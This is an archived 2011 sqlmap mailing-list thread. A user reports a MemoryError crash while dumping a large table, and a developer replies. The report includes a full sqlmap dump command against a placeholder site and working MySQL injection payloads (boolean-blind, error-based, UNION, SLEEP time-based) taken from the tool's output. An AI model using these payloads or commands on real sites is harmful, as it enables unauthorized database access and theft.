Re: [sqlmap-users] Memory problems
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Memory problems
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:55:30
|
http://mail.python.org/pipermail/mailman-users/2005-October/047436.html "A MemoryError exception is a built-in Python exception "Raised when an operation runs out of memory but the situation may still be rescued (by deleting some objects)." How many members does this list have? According to the FAQ, the largest list reported to date has 147,000 members and presumably works. Possibly something in the cPanel implementation or your particular installation limits this to a greater degree." now, this messes our concept a bit but we'll try to adapt. kr On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar <mir...@gm...> wrote: > LOL (50,350 entries in the table and 48 columns) > > we'll try to make some tests regarding this and report accordingly. > haven't planed this kind of "huge" data retrievals :) > > kr > > On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: >> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 >> -D nomes -T class --dump >> >> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 16:58:05 >> >> [16:58:05] [DEBUG] cleaning up configuration parameters >> [16:58:05] [DEBUG] setting the HTTP timeout >> [16:58:05] [DEBUG] setting the HTTP Cookie header >> [16:58:05] [DEBUG] setting the HTTP method to POST >> [16:58:05] [DEBUG] creating HTTP requests opener object >> [16:58:05] [INFO] using >> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >> [16:58:05] [INFO] resuming injection data from session file >> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >> [16:58:05] [INFO] testing connection to the target url >> you provided an HTTP Cookie header value. The target url provided its own >> Cookie within the HTTP Set-Cookie header. Do you want to continue using the >> HTTP Cookie values that you provided? [Y/n] >> sqlmap identified the following injection points with a total of 0 HTTP(s) >> requests: >> --- >> Place: POST >> Parameter: vulnparam >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: vulnparam=6 AND 5647=5647 >> >> Type: error-based >> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 >> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >> information_schema.tables GROUP BY x)a) >> >> Type: UNION query >> Title: MySQL UNION query (NULL) - 4 to 7 columns >> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), >> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: vulnparam=6 AND SLEEP(5) >> --- >> >> [16:58:06] [INFO] the back-end DBMS is MySQL >> >> web application technology: PHP 5.3.2 >> back-end DBMS: MySQL 5.0 >> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' >> [16:58:06] [INFO] read from file >> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' >> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM >> nomes.class# >> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >> >> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >> with the latest development version from the Subversion repository. If the >> exception persists, please send by e-mail to >> sql...@li... the command line, the following text and >> any information needed to reproduce the bug. The developers will try to >> reproduce the bug, fix it accordingly and get back to you. >> sqlmap version: 0.9-dev >> Python version: 2.6.5 >> Operating system: posix >> Traceback (most recent call last): >> File "./sqlmap.py", line 83, in main >> start() >> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in >> start >> action() >> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action >> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in >> dumpTable >> entries = inject.getValue(query, blind=False, dump=True) >> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue >> value = __goInband(query, expected, sort, resumeValue, unpack, dump) >> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband >> data = parseUnionPage(output, expression, partial, None, sort) >> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >> parseUnionPage >> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >> kb.injection.place, conf.parameters[kb.injection.place], expression, >> logOutput)) >> MemoryError >> >> [*] shutting down at: 17:00:13 >> >> There are about 50,350 entries in the table and 48 columns.I tested the >> query manually, and returned a page with 600k of information.I think that >> sqlmap did not support the amount of data...? >> >> David >> >> ------------------------------------------------------------------------------ >> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >> Finally, a world-class log management solution at an even better price-free! >> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >> February 28th, so secure your free ArcSight Logger TODAY! >> http://p.sf.net/sfu/arcsight-sfd2d >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
